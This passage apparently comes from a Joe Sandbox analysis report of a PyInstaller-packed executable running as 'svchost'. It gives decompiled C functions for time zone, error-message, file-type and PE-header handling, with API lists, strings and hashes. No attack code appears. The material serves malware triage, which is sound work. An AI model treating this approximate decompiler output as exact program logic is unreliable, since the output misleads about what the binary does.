                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *( *_t98) = 0;
                            								} else {
                            									( *_t98)[0x3f] = 0;
                            								}
                            								if(WideCharToMultiByte(_t95, 0, ?str?, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *(_t98[1]) = 0;
                            								} else {
                            									_t98[1][0x3f] = 0;
                            								}
                            							}
                            							 *(E00BDABF6()) = _v8;
                            							 *(E00BDABEA()) = _v12;
                            							_t60 = E00BDABF0();
                            							 *_t60 = _v16;
                            							return _t60;
                            						}
                            					}
                            				}
                            			}










































                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB1EB
                              • Part of subcall function 00BD09EB: HeapFree.KERNEL32(00000000,00000000,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?), ref: 00BD0A01
                              • Part of subcall function 00BD09EB: GetLastError.KERNEL32(?,?,00BD7F15,?,00000000,?,00000000,?,00BD7F3C,?,00000007,?,?,00BD8393,?,?), ref: 00BD0A13
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 1286116820-1154798116
                            • Opcode ID: bd4bbd1b4e20834c4fffbb86b8ef8d887d43cd00bdd531bdcc48f66409533240
                            • Instruction ID: 66f892b77dee4397ea6433c1b2d4c7b942ce8ce43d0fadee5be88eb5d94a353e
                            • Opcode Fuzzy Hash: bd4bbd1b4e20834c4fffbb86b8ef8d887d43cd00bdd531bdcc48f66409533240
                            • Instruction Fuzzy Hash: C251A572900209EBCB10DF659C81DBEFBF8EB51360B1102EBE914A7391FB308E418B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 63%
                            			E00BC4860(void* __edx, signed int _a8192, long _a8200) {
                            				short _v0;
                            				signed int _t8;
                            				long _t10;
                            				long _t11;
                            				void* _t24;
                            				signed int _t26;
                            
                            				_t24 = __edx;
                            				E00BC7880();
                            				_t8 =  *0xbec008; // 0x2eb5fe5e
                            				_a8192 = _t8 ^ _t26;
                            				_t10 = _a8200;
                            				if(_t10 == 0) {
                            					_t10 = GetLastError();
                            				}
                            				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0); // executed
                            				_t32 = _t11;
                            				if(_t11 != 0) {
                            					__eflags = E00BC4C90("An attempt to set the process default activation context failed because the process default activation context was already set.",  &_v0, 0x1000);
                            					_t19 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					_t14 =  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            					__eflags = _a8192 ^ _t26 + 0x0000000c;
                            					E00BC786A();
                            					return  !=  ? 0xbf4a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
                            				} else {
                            					_push("No error messages generated.\n");
                            					_push("FormatMessageW");
                            					E00BC1860(_t24, _t32);
                            					E00BC786A();
                            					return "PyInstaller: FormatMessageW failed.";
                            				}
                            			}










                            APIs
                            • GetLastError.KERNEL32(00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC4883
                              • Part of subcall function 00BC4C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00BC48EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 00BC4CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00BC18B9,00000000,?,?,?,00000400,?,00000000,?), ref: 00BC48A2
                            Strings
                            • FormatMessageW, xrefs: 00BC48B1
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00BC48EF
                            • PyInstaller: FormatMessageW failed., xrefs: 00BC48BE
                            • An attempt to set the process default activation context failed because the process default activation context was already set., xrefs: 00BC48E2, 00BC48F6
                            • No error messages generated., xrefs: 00BC48AC
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: An attempt to set the process default activation context failed because the process default activation context was already set.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3426200897
                            • Opcode ID: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction ID: cccf77c7ea2987186795681d30ab65b60c4e6ee22a1ca252778115d5b296ea72
                            • Opcode Fuzzy Hash: 79ef3ce4417318f701a17545daf031b251ca31d6fc0ef810f8558b501ab9a8a3
                            • Instruction Fuzzy Hash: 110188717943806BF718D7199C9BFAA32D5EB48741F4044ACB749CA1D2FB709844C757
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 677 bccbfb-bccc33 GetFileType 678 bccd2e-bccd31 677->678 679 bccc39-bccc44 677->679 680 bccd5a-bccd82 678->680 681 bccd33-bccd36 678->681 682 bccc66-bccc81 call bd38bb 679->682 683 bccc46-bccc57 call bccf93 679->683 686 bccd9f-bccda1 680->686 687 bccd84-bccd97 PeekNamedPipe 680->687 681->680 684 bccd38-bccd3a 681->684 690 bccd4b-bccd58 GetLastError call bcc998 682->690 700 bccc87-bcccb2 call bccf2d call bccdb3 682->700 697 bccc5d-bccc64 683->697 698 bccd47-bccd49 683->698 689 bccd3c-bccd41 call bcc9ce 684->689 684->690 693 bccda2-bccdb2 call bc786a 686->693 687->686 692 bccd99-bccd9c 687->692 689->698 690->698 692->686 697->682 698->693 700->698 708 bcccb8-bcccd5 call bccdb3 700->708 708->698 711 bcccd7-bccce3 call bccdb3 708->711 713 bccce8-bcccf6 711->713 713->698 714 bcccf8-bccd16 call bd38bb 713->714 714->690 717 bccd18-bccd2c call bccefb 714->717 717->693
                            C-Code - Quality: 100%
                            			E00BCCBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void _v48;
                            				char _v64;
                            				void _v72;
                            				long _v76;
                            				intOrPtr _v80;
                            				char _v84;
                            				void* __ebx;
                            				signed int _t53;
                            				signed int _t56;
                            				intOrPtr _t66;
                            				signed int _t68;
                            				int _t70;
                            				signed int _t81;
                            				signed int _t83;
                            				signed int _t85;
                            				intOrPtr _t98;
                            				signed int _t104;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t118;
                            				void* _t121;
                            				intOrPtr* _t128;
                            				signed int _t130;
                            				intOrPtr _t140;
                            
                            				_t118 = __edx;
                            				_t53 =  *0xbec008; // 0x2eb5fe5e
                            				_v8 = _t53 ^ _t130;
                            				_t128 = _a16;
                            				_t121 = _a12;
                            				_v80 = _a4;
                            				_v76 = _t121;
                            				_t56 = GetFileType(_t121); // executed
                            				_t104 = _t56 & 0xffff7fff;
                            				if(_t104 != 1) {
                            					__eflags = _t104 - 2;
                            					if(_t104 == 2) {
                            						L16:
                            						__eflags = _t104 - 2;
                            						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
                            						 *((short*)(_t128 + 8)) = 1;
                            						_t66 = _a8;
                            						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
                            						 *_t128 = _t66;
                            						__eflags = _t104 - 2;
                            						if(_t104 != 2) {
                            							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
                            							__eflags = _t70;
                            							if(_t70 != 0) {
                            								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
                            							}
                            						}
                            						_t68 = 1;
                            						__eflags = 1;
                            						L20:
                            						E00BC786A();
                            						return _t68;
                            					}
                            					__eflags = _t104 - 3;
                            					if(_t104 == 3) {
                            						goto L16;
                            					}
                            					__eflags = _t104;
                            					if(_t104 != 0) {
                            						L15:
                            						E00BCC998(GetLastError());
                            						L14:
                            						_t68 = 0;
                            						goto L20;
                            					}
                            					 *((intOrPtr*)(E00BCC9CE())) = 9;
                            					goto L14;
                            				}
                            				 *((short*)(_t128 + 8)) = 1;
                            				_t74 = _v80;
                            				if(_v80 == 0) {
                            					L4:
                            					_t109 = 0xa;
                            					memset( &_v48, 0, _t109 << 2);
                            					if(E00BD38BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
                            						goto L15;
                            					}
                            					 *((short*)(_t128 + 6)) = E00BCCF2D(0, _v16, _v80);
                            					_t81 = E00BCCDB3(_v32, _v28, 0, 0); // executed
                            					 *(_t128 + 0x20) = _t81;
                            					 *(_t128 + 0x24) = _t118;
                            					if((_t81 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t24 = _t128 + 0x20; // 0x83cc758d
                            					_t83 = E00BCCDB3(_v40, _v36,  *_t24, _t118); // executed
                            					 *(_t128 + 0x18) = _t83;
                            					 *(_t128 + 0x1c) = _t118;
                            					if((_t83 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t29 = _t128 + 0x24; // 0xcb830cc4
                            					_t30 = _t128 + 0x20; // 0x83cc758d
                            					_t85 = E00BCCDB3(_v48, _v44,  *_t30,  *_t29); // executed
                            					 *(_t128 + 0x28) = _t85;
                            					 *(_t128 + 0x2c) = _t118;
                            					_t144 = (_t85 & _t118) - 0xffffffff;
                            					if((_t85 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t111 = 6;
                            					memset( &_v72, 0, _t111 << 2);
                            					if(E00BD38BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
                            						goto L15;
                            					}
                            					_t39 = _t128 + 0x14; // 0xbccb3d
                            					_t68 = E00BCCEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
                            					goto L20;
                            				}
                            				_v84 = 0;
                            				if(E00BCCF93(_t74,  &_v84) == 0) {
                            					goto L14;
                            				}
                            				_t98 = _v84 - 1;
                            				_t140 = _t98;
                            				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
                            				 *_t128 = _t98;
                            				goto L4;
                            			}



































                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00BCCC20
                              • Part of subcall function 00BCCF93: __dosmaperr.LIBCMT ref: 00BCCFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BCCB29), ref: 00BCCD4B
                            • __dosmaperr.LIBCMT ref: 00BCCD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00BCCD8F
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction ID: e9b46a2f8cf11b53259e913c3f8b379091bb73f3fe4e20c5d45db6fd7413b7b7
                            • Opcode Fuzzy Hash: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction Fuzzy Hash: 5551A172900608AFDB14DFB8CC41EAEBFF9EF18310B14857DE55AD7260EB7099459B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 720 bc1120-bc1153 call bc9f16 call bc9b2b 725 bc1159-bc115c 720->725 726 bc11f2-bc11f7 720->726 725->726 727 bc1162-bc1189 call bc9f16 call bc9b2b call bc9f16 725->727 733 bc118e-bc11a8 call bc9b2b 727->733 733->726 736 bc11aa-bc11ad 733->736 737 bc11af-bc11b4 736->737 738 bc11b6-bc11b9 736->738 739 bc11c0-bc11f1 call bc9f16 call bc9b2b 737->739 738->726 740 bc11bb 738->740 740->739
                            C-Code - Quality: 100%
                            			E00BC1120(void* __edx, void* _a4) {
                            				char _v4;
                            				signed int _t15;
                            				intOrPtr _t30;
                            				signed int _t32;
                            
                            				_t34 = __edx;
                            				_t35 = _a4;
                            				_v4 = 0;
                            				E00BC9F16(__edx,  *_a4, 0, 0); // executed
                            				E00BC9B2B( &_a4, 1, 2,  *_a4); // executed
                            				_t15 = _a4;
                            				if(_t15 != 0x4d || _t15 != 0x5a) {
                            					L8:
                            					return _t15 | 0xffffffff;
                            				} else {
                            					E00BC9F16(__edx,  *_t35, 0x3c, 0); // executed
                            					E00BC9B2B( &_v4, 4, 1,  *_t35);
                            					E00BC9F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
                            					E00BC9B2B( &_a4, 2, 1,  *_t35);
                            					_t15 = _a4;
                            					if(_t15 != 0xb) {
                            						goto L8;
                            					} else {
                            						if(_t15 != 1) {
                            							if(_t15 != 2) {
                            								goto L8;
                            							} else {
                            								_t32 = 0xa8;
                            								goto L7;
                            							}
                            						} else {
                            							_t32 = 0x98;
                            							L7:
                            							E00BC9F16(_t34,  *_t35, _v4 + _t32, 0);
                            							E00BC9B2B( &_v4, 4, 1,  *_t35);
                            							_t30 = _v4;
                            							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
                            							return  ==  ? _t32 | 0xffffffff : _t30;
                            						}
                            					}
                            				}
                            			}








                            APIs
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction ID: 6562a225a6d9a55a652f5c0f4fdcab9b1f01f768efeb802c34641febffc84a15
                            • Opcode Fuzzy Hash: 0f18c8a29637b3e68dead0b09e1943be6a98e9a9608b54b83cbe93af802145a5
                            • Instruction Fuzzy Hash: DE21DC71644301BAFA306E18CC87F9A73DAEF41724F14095DF3D0BA1D6DAAADC428B06
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 745 bccdb3-bccdc9 746 bccdd9-bccde9 FileTimeToSystemTime 745->746 747 bccdcb-bccdcf 745->747 749 bcce3d-bcce49 GetLastError call bcc998 746->749 750 bccdeb-bccdfd SystemTimeToTzSpecificLocalTime 746->750 747->746 748 bccdd1-bccdd7 747->748 752 bcce4f-bcce5c call bc786a 748->752 757 bcce4a-bcce4d 749->757 750->749 753 bccdff-bcce1f call bcce5d 750->753 759 bcce24-bcce2e 753->759 757->752 759->752 760 bcce30-bcce3b call bcc9ce 759->760 760->757
                            C-Code - Quality: 100%
                            			E00BCCDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
                            				signed int _v8;
                            				struct _SYSTEMTIME _v24;
                            				struct _SYSTEMTIME _v40;
                            				signed int _v44;
                            				signed int _t20;
                            				signed int _t26;
                            				signed int _t27;
                            				int _t30;
                            				signed int _t43;
                            				signed int _t46;
                            
                            				_t20 =  *0xbec008; // 0x2eb5fe5e
                            				_v8 = _t20 ^ _t46;
                            				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
                            					if(FileTimeToSystemTime( &_a4,  &_v40) == 0) {
                            						L7:
                            						_t26 = E00BCC998(GetLastError());
                            						goto L8;
                            					} else {
                            						_t30 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
                            						if(_t30 == 0) {
                            							goto L7;
                            						} else {
                            							_v44 = _v44 | 0xffffffff;
                            							_t27 = E00BCCE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44); // executed
                            							if((_t27 & _t43) == 0xffffffff) {
                            								_t26 = E00BCC9CE();
                            								 *_t26 = 0x84;
                            								L8:
                            								_t27 = _t26 | 0xffffffff;
                            							}
                            						}
                            					}
                            				} else {
                            					_t27 = _a12;
                            				}
                            				E00BC786A();
                            				return _t27;
                            			}














                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 00BCCDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BCCDF5
                            • GetLastError.KERNEL32 ref: 00BCCE3D
                            • __dosmaperr.LIBCMT ref: 00BCCE44
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction ID: 4a551bcde6aa1bf4fc9a2c113122b7f96ba56e21cc61711b6179efebfa9cc4a0
                            • Opcode Fuzzy Hash: f54be86c729cadeda82c0f5de60323b3e2fea15e0f44ca57e7542794b1418b2a
                            • Instruction Fuzzy Hash: 59212E7290010DABCB01DFE4C985FDE7BFCEB19320F1046AAE51AD7180EB74EA449B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E00BC2450(void* __edx, void* __eflags, char _a4092, char _a4096, char _a8192, signed int _a12284, signed int _a12288, intOrPtr _a12292, intOrPtr _a12296, intOrPtr _a12300) {
                            				char _v0;
                            				char _v4;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t35;
                            				signed int _t39;
                            				signed int _t49;
                            				signed int _t52;
                            				signed int _t53;
                            				signed int _t60;
                            				signed int _t63;
                            				signed int _t64;
                            				signed int _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t79;
                            				signed int _t85;
                            				signed int _t87;
                            				signed int _t91;
                            				signed int _t93;
                            				intOrPtr _t98;
                            				signed int _t101;
                            				intOrPtr* _t102;
                            				intOrPtr _t104;
                            				signed int _t108;
                            				void* _t110;
                            				void* _t112;
                            				void* _t114;
                            				signed int _t115;
                            				void* _t117;
                            				void* _t120;
                            
                            				_t120 = __eflags;
                            				_t90 = __edx;
                            				E00BC7880();
                            				_t35 =  *0xbec008; // 0x2eb5fe5e
                            				_a12288 = _t35 ^ _t108;
                            				_t104 = _a12300;
                            				E00BCD2BE(E00BCA7EB(2), 0);
                            				_push(0);
                            				_t39 = E00BC1770(_t120);
                            				_t93 = _t39;
                            				_t110 = _t108 + 0x10;
                            				if(_t93 != 0) {
                            					_t39 = E00BC27A0(__edx,  &_v0, _v0);
                            					_t110 = _t110 + 8;
                            					__eflags = _t39;
                            					if(_t39 == 0) {
                            						goto L1;
                            					} else {
                            						_t39 = E00BC26F0( &_a8192,  &_v0);
                            						_t110 = _t110 + 8;
                            						__eflags = _t39;
                            						if(__eflags == 0) {
                            							goto L1;
                            						} else {
                            							_t39 = L00BC2930(__eflags,  &_a4096,  &_v0);
                            							_t110 = _t110 + 8;
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								goto L1;
                            							} else {
                            								_push(_t76);
                            								_push("_MEIPASS2");
                            								_t77 = E00BC3E40(_t76, _t93);
                            								E00BC43D0("_MEIPASS2");
                            								_t49 = E00BC1690(_t104, _t93,  &_v0);
                            								_t112 = _t110 + 0x10;
                            								__eflags = _t49;
                            								if(_t49 != 0) {
                            									L8:
                            									 *((intOrPtr*)(_t93 + 0x4074)) = _t104;
                            									_t98 = _a12296;
                            									 *((intOrPtr*)(_t93 + 0x4070)) = _t98;
                            									__eflags = _t77;
                            									if(_t77 != 0) {
                            										L11:
                            										__imp__SetDllDirectoryW(E00BC4BF0(0, _t77, 0));
                            										L00BC9803(_t50);
                            										_t114 = _t112 + 0x10;
                            										__eflags = _t77;
                            										if(_t77 == 0) {
                            											_t98 = _a12292;
                            											goto L25;
                            										} else {
                            											_t85 = _t77;
                            											_t63 =  &_a4092;
                            											while(1) {
                            												_t91 =  *_t63;
                            												__eflags = _t91 -  *_t85;
                            												if(_t91 !=  *_t85) {
                            													break;
                            												}
                            												__eflags = _t91;
                            												if(_t91 == 0) {
                            													L17:
                            													_t64 = 0;
                            												} else {
                            													_t91 =  *((intOrPtr*)(_t63 + 1));
                            													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
                            													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
                            														break;
                            													} else {
                            														_t63 = _t63 + 2;
                            														_t85 = _t85 + 2;
                            														__eflags = _t91;
                            														if(_t91 != 0) {
                            															continue;
                            														} else {
                            															goto L17;
                            														}
                            													}
                            												}
                            												L19:
                            												__eflags = _t64;
                            												if(__eflags == 0) {
                            													L23:
                            													_push(_t93);
                            													E00BC2140(_t91, __eflags);
                            													_t101 = E00BC2010(_t77, __eflags, _t93); // executed
                            													L00BC2130(_t93); // executed
                            													_t115 = _t114 + 0xc;
                            													goto L31;
                            												} else {
                            													_t21 = _t93 + 0x2068; // 0x2068
                            													_t102 = _t21;
                            													_t52 = E00BC1AC0(_t102, 0x1000, "%s", _t77);
                            													_t115 = _t114 + 0x10;
                            													__eflags = _t52 - 0x1000;
                            													if(_t52 >= 0x1000) {
                            														goto L27;
                            													} else {
                            														_t22 = _t93 + 0x3068; // 0x3068
                            														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
                            														_t87 = _t22 - _t102;
                            														__eflags = _t87;
                            														do {
                            															_t68 =  *_t102;
                            															_t102 = _t102 + 1;
                            															 *((char*)(_t87 + _t102 - 1)) = _t68;
                            															__eflags = _t68;
                            														} while (__eflags != 0);
                            														goto L23;
                            													}
                            												}
                            												goto L32;
                            											}
                            											asm("sbb eax, eax");
                            											_t64 = _t63 | 0x00000001;
                            											__eflags = _t64;
                            											goto L19;
                            										}
                            									} else {
                            										_t69 = E00BC21D0(_t93);
                            										_t114 = _t112 + 4;
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											L25:
                            											_t52 = E00BC2070(_t90, _t104, _t93);
                            											_t115 = _t114 + 4;
                            											__eflags = _t52;
                            											if(_t52 != 0) {
                            												L27:
                            												_t53 = _t52 | 0xffffffff;
                            											} else {
                            												__eflags =  *((char*)(_t93 + 0x2068));
                            												_t29 = _t93 + 0x2068; // 0x2068
                            												_t79 = _t29;
                            												_t55 =  !=  ? _t79 :  &_a4092;
                            												E00BC4390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
                            												_push("_MEIPASS2");
                            												E00BC3E40(_t79, _t93);
                            												_push(_t93);
                            												_t52 = E00BC80A0();
                            												_t115 = _t115 + 0x10;
                            												__eflags = _t52 - 0xffffffff;
                            												if(__eflags != 0) {
                            													E00BC23D0(_t52);
                            													_push(_t104);
                            													_push(_t98);
                            													_push(_t93);
                            													_push( &_v4);
                            													_t60 = E00BC4400(_t90, _t104, __eflags);
                            													_t117 = _t115 + 0x10;
                            													_t101 = _t60;
                            													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
                            													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
                            														_push(_t79);
                            														E00BC40E0(_t90);
                            														_t117 = _t117 + 4;
                            													}
                            													E00BC1730(_t90, _t104, _t93);
                            													_t115 = _t117 + 4;
                            													L31:
                            													_t53 = _t101;
                            												} else {
                            													goto L27;
                            												}
                            											}
                            										} else {
                            											_t77 =  &_a4096;
                            											goto L11;
                            										}
                            									}
                            									L32:
                            									__eflags = _a12284 ^ _t115;
                            									E00BC786A();
                            									return _t53;
                            								} else {
                            									_t71 = E00BC1690(_t104, _t93,  &_a8192);
                            									_t112 = _t112 + 8;
                            									__eflags = _t71;
                            									if(__eflags != 0) {
                            										goto L8;
                            									} else {
                            										_push( &_a8192);
                            										_t74 = E00BC1910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
                            										__eflags = _a12288 ^ _t112 + 0x0000000c;
                            										E00BC786A();
                            										return _t74 | 0xffffffff;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					E00BC786A();
                            					return _t39 | 0xffffffff;
                            				}
                            			}







































                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: 84cb77bd3fadd8d78b786077c12cfcd888888e75027307bd4e48ab1035feb9ed
                            • Instruction ID: 0c881da09ee5a96b7feed6cb3ca558170ab86a5f16dff91839f3f00dd3a5e326
                            • Opcode Fuzzy Hash: 84cb77bd3fadd8d78b786077c12cfcd888888e75027307bd4e48ab1035feb9ed
                            • Instruction Fuzzy Hash: 99515C729042406BE621BB709C92FAB73DCEF91354F0405BDF95882283FB25DA18C6B3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00BDB2EE(void* __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v264;
                            				char _v268;
                            				char _v272;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t10;
                            				void* _t14;
                            				void* _t17;
